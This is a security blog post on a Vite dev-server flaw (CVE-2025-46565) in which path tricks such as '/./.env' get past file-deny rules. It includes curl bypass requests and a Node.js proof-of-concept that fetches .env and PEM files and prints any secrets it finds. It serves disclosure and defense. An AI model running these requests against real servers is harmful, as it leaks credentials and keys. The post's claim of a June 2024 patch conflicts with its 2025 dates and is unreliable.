Vite, the blazing-fast frontend tooling framework loved by modern JavaScript developers, recently faced a significant security flaw (CVE-2025-46565) that exposed sensitive files during development. Even though this vulnerability was patched in June 2024, many developers are still unaware of how dangerous it was—and how simple its exploitation could be. In this post, we’ll break down what happened, show you a proof-of-concept, and explain what you can do to keep your local secrets safe.

Background: What is Vite and Why Should You Care?

Vite is a popular next-generation frontend build tool. Many React, Vue, and Svelte apps use Vite for its speed and simplicity. During development, Vite spins up a local web server so you can preview and hot-reload your work.

Now, imagine exposing this dev server on your local network—maybe for mobile testing or team demos.

Here's the trouble:
Vite (before the patched versions) tried to protect sensitive files, such as .env files or SSL certificates, from being served to the browser. It excludes files matching patterns like .env, .env.*, *.crt, or *.pem through the server.fs.deny option. But the check had a flaw.

The Vulnerability Explained

By using a special path trick—adding a combination of slash and dot (/.) in URLs—an attacker could _bypass_ these deny patterns. For example, instead of requesting /.env (which Vite blocked), you could try /./.env or /projectRoot/./.env, and Vite would serve the file in the browser.

Key points

- Only apps where Vite’s dev server is accessible from the network are at risk (those started with vite --host or server.host: '...').

Let’s say you’re running Vite like this:

vite --host

Or in your vite.config.js:

export default {
  server: {
    host: true // or '...'
  }
}

If your .env contains secret API keys:

VITE_API_KEY=shhhSuperSecret

Normally, curl http://localhost:5173/.env will NOT reveal the contents, as it's denied.

But, with the exploit:

curl http://localhost:5173/./.env

Or even:

curl http://localhost:5173/somepath/../../.env
curl http://localhost:5173/%2e/%2eenv  # URL-encoded

One of these could yield:

VITE_API_KEY=shhhSuperSecret

☠️ _Sensitive secrets leaked to anyone on your network!_

Here’s a Node.js proof-of-concept that scans for exposed files over the network:

const axios = require('axios');

// Request spellings that bypassed the deny check in affected versions.
const targets = [
  'http://localhost:5173/./.env',
  'http://localhost:5173/%2e/%2eenv',
  'http://localhost:5173/./certs/server.pem',
  // Add more patterns as needed
];

(async () => {
  for (const url of targets) {
    try {
      const res = await axios.get(url, { responseType: 'text' });
      // Look for .env-style keys or PEM headers in the response body.
      if (typeof res.data === 'string' && /VITE_|-----BEGIN/.test(res.data)) {
        console.log(`[!] Exposed file found at: ${url}`);
        console.log(res.data);
      }
    } catch (e) {
      // Ignore 404s and connection errors
    }
  }
})();

- Vite Security Advisory: GitHub Security Advisory GHSA-7c5m-hmf9-5mqq
- Patched Versions: Vite Releases
- CVEs: CVE-2025-46565 on NVD *(link may not be live yet)*
- Follow Upstream Guidance: Subscribe to the Vite repo security advisories.

Closing Thoughts

CVE-2025-46565 is a classic lesson: _Even dev tools need robust security_. Local secrets are just as valuable to attackers, and a simple misconfiguration or path normalization bug can have real consequences. Always use the latest versions, lock down network-exposed dev tools, and be alert to new advisories.

If you found this write-up useful—share it with your team, and keep your secrets secret!


*Written exclusively for your security toolbox. Stay safe out there!*

Timeline

Published on: 05/01/2025 18:15:57 UTC
Last modified on: 05/02/2025 18:15:27 UTC